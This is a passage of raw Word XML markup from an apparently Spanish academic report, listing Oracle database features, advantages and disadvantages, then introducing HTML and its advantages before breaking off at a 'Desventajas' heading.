          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Protección de datos: seguridad completa en el entorno de producción y de pruebas y gestión de copias de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Lenguaje de diseño de bases de datos muy completo (PL/SQL): permite implementar diseños “activos”, que se pueden adaptar a las necesidades cambiantes de negocio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Alta disponibilidad: escalabilidad, protección y alto rendimiento para la actividad empresarial.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Gestión de usuarios: agilidad en los trámites, reducción de costes y seguridad en el control de las personas que acceden a las aplicaciones y a los sistemas.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="730191849"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Var16 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>(Varela, 2016)</w:t>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00C64A6E">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ventajas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Motor de base de datos objeto-relacional más usado a nivel mundial.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Multiplataforma: puede ejecutarse desde un PC hasta una supercomputadora.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Permite el uso de particiones para hacer consultas, informes, análisis de datos, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporta todas las funciones que se esperan de un buen servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Software del servidor que puede ejecutarse en multitud de sistemas operativos: Linux, Mac, Windows, etc. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="856698830"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Var16 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>(Varela, 2016)</w:t>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00C64A6E">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Desventajas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El mayor inconveniente de Oracle es quizás su precio incluso las licencias de Personal Oracle son excesivamente caras.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>También es elevado el coste de la formación y solo últimamente han comenzado a aparecer buenos libros sobre asuntos técnicos distintos de la simple instalación y administración.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00C64A6E">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00800CB8" w:rsidRPr="00800CB8" w:rsidRDefault="00800CB8" w:rsidP="00800CB8"/>
    <w:p w:rsidR="00890B46" w:rsidRPr="00890B46" w:rsidRDefault="00890B46" w:rsidP="00890B46">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00890B46" w:rsidRDefault="00890B46" w:rsidP="00890B46">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc514520843"/>
      <w:r w:rsidRPr="00890B46">
        <w:t>Lado cliente: Maquetado y Diseño</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidRPr="00890B46">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9"/>
    <w:p w:rsidR="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9"/>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38AD0094" wp14:editId="5FFC0295">
            <wp:extent cx="1571625" cy="1571625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="49" name="Imagen 49" descr="Resultado de imagen para htm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html logo"/>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71625" cy="1571625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE55FF" w:rsidRDefault="00CE55FF" w:rsidP="004C1CB9"/>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="00CE55FF" w:rsidP="004C1CB9">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004C1CB9" w:rsidRPr="004C1CB9">
        <w:t>HTML significa "Lenguaje de Marcado de Hypertexto" por sus siglas en inglés "HyperText Markup Language", es un lenguaje que pertenece a la familia de los "lenguajes de marcado" y es utilizado para la elaboración de páginas web. El estándar HTML lo define la W3C (World Wide Web Consortium) y actualmente HTML se encuentra en su versión HTML5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9"/>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004C1CB9">
        <w:t>Cabe destacar que HTML no es un lenguaje de programación ya que no cuenta con funciones aritméticas, variables o estructuras de control propias de los lenguajes de programación, por lo que HTML genera únicamente páginas web estáticas, sin embargo, HTML se puede usar en conjunto con diversos lenguajes de programación para la creación de páginas web dinámicas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ventajas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sencillo que permite describir hipertexto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Texto presentado de forma estructurada y agradable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No necesita de grandes conocimientos cuando se cuenta con un editor de páginas web o WYSIWYG.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Archivos pequeños.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Despliegue rápido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Lenguaje de fácil aprendizaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Lo admiten todos los exploradores.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050420F" w:rsidRPr="004C1CB9" w:rsidRDefault="0050420F" w:rsidP="0050420F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Desventajas:</w:t>
      </w:r>
    </w:p>
